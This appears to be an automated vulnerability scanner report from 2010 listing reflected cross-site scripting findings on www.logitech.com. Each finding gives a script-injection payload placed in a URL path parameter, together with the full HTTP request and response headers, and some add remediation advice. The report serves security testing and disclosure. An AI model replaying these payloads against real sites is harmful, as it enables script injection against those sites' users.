<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a7e7"><script>alert(1)</script>afc3c8f6f2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us1a7e7"><script>alert(1)</script>afc3c8f6f2c/478/3025 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47128"><script>alert(1)</script>4276fdcad27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/47847128"><script>alert(1)</script>4276fdcad27/3025 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88d6d</script><script>alert(1)</script>a68b6d6e99b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/47888d6d</script><script>alert(1)</script>a68b6d6e99b/3025 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a33e9</script><script>alert(1)</script>6709a5bf464 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/3025a33e9</script><script>alert(1)</script>6709a5bf464 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be4f2"><script>alert(1)</script>ccd650dd212 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/3025be4f2"><script>alert(1)</script>ccd650dd212 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6a40</script><script>alert(1)</script>f5be895e905 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a6a40</script><script>alert(1)</script>f5be895e905/478/3029 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30b5d"%3b69b39fc64ff was submitted in the REST URL parameter 1. This input was echoed as 30b5d";69b39fc64ff in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us30b5d"%3b69b39fc64ff/478/3029 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a5a"><script>alert(1)</script>6b39318e711 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-use3a5a"><script>alert(1)</script>6b39318e711/478/3029 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c997</script><script>alert(1)</script>6c6f50f0a1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/4781c997</script><script>alert(1)</script>6c6f50f0a1c/3029 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b81a"><script>alert(1)</script>75e52142cba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/4786b81a"><script>alert(1)</script>75e52142cba/3029 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bc41"><script>alert(1)</script>e2b9f5d9a4a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/30292bc41"><script>alert(1)</script>e2b9f5d9a4a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ce73</script><script>alert(1)</script>10ce5c1a051 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/30298ce73</script><script>alert(1)</script>10ce5c1a051 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba7c0</script><script>alert(1)</script>0fb2b486c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ba7c0</script><script>alert(1)</script>0fb2b486c1/478/3360 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1bcb"%3b38c9b6513bc was submitted in the REST URL parameter 1. This input was echoed as e1bcb";38c9b6513bc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-use1bcb"%3b38c9b6513bc/478/3360 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85a32"><script>alert(1)</script>40546c34537 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us85a32"><script>alert(1)</script>40546c34537/478/3360 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb414"><script>alert(1)</script>eca92e8eaa2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478bb414"><script>alert(1)</script>eca92e8eaa2/3360 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab18c</script><script>alert(1)</script>46b7a725457 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478ab18c</script><script>alert(1)</script>46b7a725457/3360 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3f04"><script>alert(1)</script>34fbbec34d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/3360e3f04"><script>alert(1)</script>34fbbec34d8 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37157</script><script>alert(1)</script>6cd4c7e9b42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/336037157</script><script>alert(1)</script>6cd4c7e9b42 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d21d"%3b7477ee95755 was submitted in the REST URL parameter 1. This input was echoed as 6d21d";7477ee95755 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us6d21d"%3b7477ee95755/478/3362 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5015</script><script>alert(1)</script>f7c6746cff2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a5015</script><script>alert(1)</script>f7c6746cff2/478/3362 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eee69"><script>alert(1)</script>b8b1ca3919c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-useee69"><script>alert(1)</script>b8b1ca3919c/478/3362 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20674</script><script>alert(1)</script>5b9c139d8a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/47820674</script><script>alert(1)</script>5b9c139d8a7/3362 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc0b1"><script>alert(1)</script>4d004b570c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478cc0b1"><script>alert(1)</script>4d004b570c9/3362 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11798"><script>alert(1)</script>15267ab2ec1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/336211798"><script>alert(1)</script>15267ab2ec1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65915</script><script>alert(1)</script>3fe1fbe96d5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/336265915</script><script>alert(1)</script>3fe1fbe96d5 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39978"><script>alert(1)</script>2082d7c7447 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us39978"><script>alert(1)</script>2082d7c7447/478/3363 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d282</script><script>alert(1)</script>08cfcb119a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8d282</script><script>alert(1)</script>08cfcb119a1/478/3363 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
